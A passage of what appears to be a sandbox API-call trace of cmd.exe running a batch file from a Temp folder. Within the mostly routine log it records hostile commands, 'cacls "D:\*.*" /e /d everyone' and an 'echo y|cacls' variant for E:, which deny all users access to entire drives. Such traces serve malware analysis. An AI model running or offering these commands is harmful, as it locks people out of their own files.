(_String1="cacls", _String2="RD") returned -15 [0036.607] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.607] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.607] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.607] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.607] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.607] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.607] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.607] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.607] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.607] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.607] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.607] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.607] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.607] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.607] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.607] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.607] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.607] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.607] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.607] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.607] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.607] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.607] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.607] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.607] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.607] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.607] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.607] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.607] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.607] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.607] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.607] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.607] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.608] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.608] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.608] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.608] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.608] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.608] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.608] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.608] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.608] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.608] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.608] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.608] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.608] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.608] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.608] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.608] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.608] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.608] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.608] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.608] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.608] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.608] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.608] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.608] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.608] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.608] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.608] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.608] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.608] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.608] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.608] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.608] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.608] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.608] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.608] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.608] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.608] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.608] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.608] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.608] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.608] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.608] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.608] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.608] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.608] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.608] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.608] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.608] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.608] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.608] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.608] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.609] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.609] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.609] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.609] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.609] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.609] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.609] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.609] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.609] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.609] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.609] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.609] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.609] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.609] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.609] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.609] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.609] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.609] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.609] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.609] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.609] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.609] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.609] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.609] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.609] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.609] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.609] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.609] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.609] SetErrorMode (uMode=0x0) returned 0x0 [0036.609] SetErrorMode (uMode=0x1) returned 0x0 [0036.609] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd18080, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.609] SetErrorMode (uMode=0x0) returned 0x1 [0036.609] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.609] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.609] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.609] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.609] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.609] GetLastError () returned 0x2 [0036.609] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18268 [0036.610] FindClose (in: hFindFile=0xd18268 | out: hFindFile=0xd18268) returned 1 [0036.610] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.610] GetLastError () returned 0x2 [0036.610] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18268 [0036.610] FindClose (in: hFindFile=0xd18268 | out: hFindFile=0xd18268) returned 1 [0036.610] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.610] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.610] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.610] SetErrorMode (uMode=0x0) returned 0x0 [0036.610] SetErrorMode (uMode=0x1) returned 0x0 [0036.610] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1b028, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.610] SetErrorMode (uMode=0x0) returned 0x1 [0036.610] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.610] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.610] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.610] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.610] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.610] GetLastError () returned 0x2 [0036.610] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.610] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18550 [0036.610] FindClose (in: hFindFile=0xd18550 | out: hFindFile=0xd18550) returned 1 [0036.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.611] GetLastError () returned 0x2 [0036.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18550 [0036.611] FindClose (in: hFindFile=0xd18550 | out: hFindFile=0xd18550) returned 1 [0036.611] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.611] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.611] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.611] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.611] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.611] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.611] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.612] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.612] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.612] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"D:\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"D:\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"D:\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0xb44, dwThreadId=0xb3c)) returned 1 [0036.615] CloseHandle (hObject=0x80) returned 1 [0036.615] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.615] GetEnvironmentStringsW () returned 0xd1b190* [0036.615] FreeEnvironmentStringsA (penv="=") returned 1 [0036.615] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.615] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.615] _close (_FileHandle=4) returned 0 [0036.615] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0036.682] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.683] CloseHandle (hObject=0x94) returned 1 [0036.683] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0036.684] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x3) returned 1 [0036.684] CloseHandle (hObject=0x8c) returned 1 [0036.684] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.684] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.685] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.685] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.685] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.685] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.685] SetConsoleInputExeNameW () returned 0x1 [0036.685] GetConsoleOutputCP () returned 0x1b5 [0036.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.685] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c [0036.685] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0036.685] _get_osfhandle (_FileHandle=3) returned 0x8c [0036.685] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0036.686] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0036.686] ReadFile (in: hFile=0x8c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x59f, lpOverlapped=0x0) returned 1 [0036.686] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0036.686] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 38 [0036.686] GetFileType (hFile=0x8c) returned 0x1 [0036.686] _get_osfhandle (_FileHandle=3) returned 0x8c [0036.686] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0036.686] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.686] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.686] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.686] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.686] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.686] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.686] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.686] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.686] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.686] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.686] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.686] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.686] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.686] _tell (_FileHandle=3) returned 1269 [0036.686] _close (_FileHandle=3) returned 0 [0036.686] _pipe (in: _PtHandles=0xd25ef8, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25ef8) returned 0 [0036.687] _dup (_FileHandle=1) returned 5 [0036.687] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.687] _close (_FileHandle=4) returned 0 [0036.687] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.687] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.687] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.687] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.687] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.687] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.687] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.687] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.687] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.687] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.687] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.687] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.687] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.687] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.687] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.687] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.687] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.687] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.687] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.687] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.687] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.687] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.687] SetErrorMode (uMode=0x0) returned 0x0 [0036.687] SetErrorMode (uMode=0x1) returned 0x0 [0036.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd17f78, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.687] SetErrorMode (uMode=0x0) returned 0x1 [0036.687] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.687] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd18078 [0036.687] FindClose (in: hFindFile=0xd18078 | out: hFindFile=0xd18078) returned 1 [0036.688] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.688] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.688] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.688] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.688] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.688] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.688] _wcsnicmp 